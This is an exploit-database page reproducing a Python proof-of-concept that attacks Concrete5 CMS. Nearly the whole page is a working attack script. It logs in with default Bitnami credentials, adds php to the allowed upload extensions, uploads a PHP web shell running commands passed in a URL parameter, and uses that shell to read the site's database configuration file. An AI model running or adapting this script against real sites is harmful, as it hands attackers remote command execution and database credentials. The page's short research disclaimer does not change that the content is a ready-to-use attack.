Advertisement






Concrete5 Proof Of Concept Shell Upload

CVE Category Price Severity
CWE-434 Not disclosed High
Author Risk Exploitation Type Date
Unknown High Remote 2017-05-31
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017050234

Below is a copy:

Concrete5 Proof Of Concept Shell Uploadc@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
#!/usr/bin/env python
# shell-concrete5.py - module based on previous version
#   created 29.04.2017. Bug ('feature') is exploitable only
#   when you will have a valid credentials.
import sys
import re
import requests

target = raw_input("[+] Hostname> ")
logMe = target + '/index.php/login'
session = requests.session()

initreq = session.get(logMe)
initresp = initreq.text

gettoken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
found = re.search(gettoken, initresp)

if found:
  token = found.group(1)
  print '[+] Found token: ' + str(token)


  # assuming token is valid, let's log in
  login_data = {
        'uName':'user',
        'uPassword':'bitnami',
        'ccm_token':token
  }
  loglink = target + '/index.php/login/authenticate/concrete'
  loginreq = session.post(loglink, data=login_data)

  #afterlogin = target + '/index.php/dashboard/system'
  afterlogin = target + '/index.php/dashboard/system/files/filetypes'
  nextreq1 = session.get(afterlogin)
  nextresp1 = nextreq1.text
  print '[+] Cool, we\'re logged-in!'
  #print afterlogin
  #print nextresp1
  print '[+] We are ready to go, extension-page is available.'
  print ''

  # construct POST with new.ext
  newToken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
  foundToken = re.search(newToken, nextresp1)

  if foundToken:
    newOne = foundToken.group(1)
    print '[+] New token grabbed: ' + str(newOne)

    data_ext = {
        'ccm_token':newOne,
        'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'
    }
    datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'
    datareq = session.post(datalink, data=data_ext)
    dataresp = datareq.text
    nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)</textarea>')
    newexts = re.search(nowwecan, dataresp)

    if newexts:
      print '[+] Available now: '+  newexts.group(1)

      print '[+] Time to upload shell...'

      # next token to upload request
      nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'
      tokreq3 = session.get(nextTokenUrl)
      tokresp3 = tokreq3.text

      grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')
      foundit = re.search(grabNextTok, tokresp3)

      if foundit:
        tokentoup = foundit.group(1)
        print '[+] Next token (3rd): ' + str( tokentoup )

      # we are logged-in; preparing req to upload shell
      saymyname = 'meshell3.php'

      fp = open(saymyname,'w')
      fp.write('<?php system($_GET["xx"]);')
      fp.close()

      # tmpshfile ready, do req now
      up_files = { 'file':open(saymyname,'rb') }

      up_params = {
          'ccm_token':tokentoup,
          'filename':saymyname,
          'currentFolder':'0'
      }
      upreqlink = target + '/index.php/ccm/system/file/upload'
      upreqnow = session.post(upreqlink, files=up_files, data=up_params)
      upresp = upreqnow.text
      if saymyname in upresp:
        print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')'

        searchme = target + '/index.php/dashboard/files/search'
        dosearch = session.get(searchme)
        meresp = dosearch.text

        searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":')
        foundShLink = re.search(searchShLink, meresp)

        if foundShLink:
          foundId = foundShLink.group(3)
          shid = foundId.strip('\/')
          print '[+] Found link ID:' + str(shid)

          preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid)
          prepreq = session.get(preparingProp)
          prepresp = prepreq.text
          whereareutxt = '<a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'">'
          whereareu = re.compile(whereareutxt)
          foundme2 = re.search(whereareu, prepresp)

          if foundme2:
            print '[+] Shell is ready to use:'
            shellshere =  target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'
            print '       ' + shellshere

            print '[+] "Finish him!" ;7'
            finish = session.get(shellshere)
            fintxt = finish.text
            print '[+] Response:'
            print fintxt
            print '\n---------------'

      else:
        print  '[-] I can not upload our shell. Verify!'

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum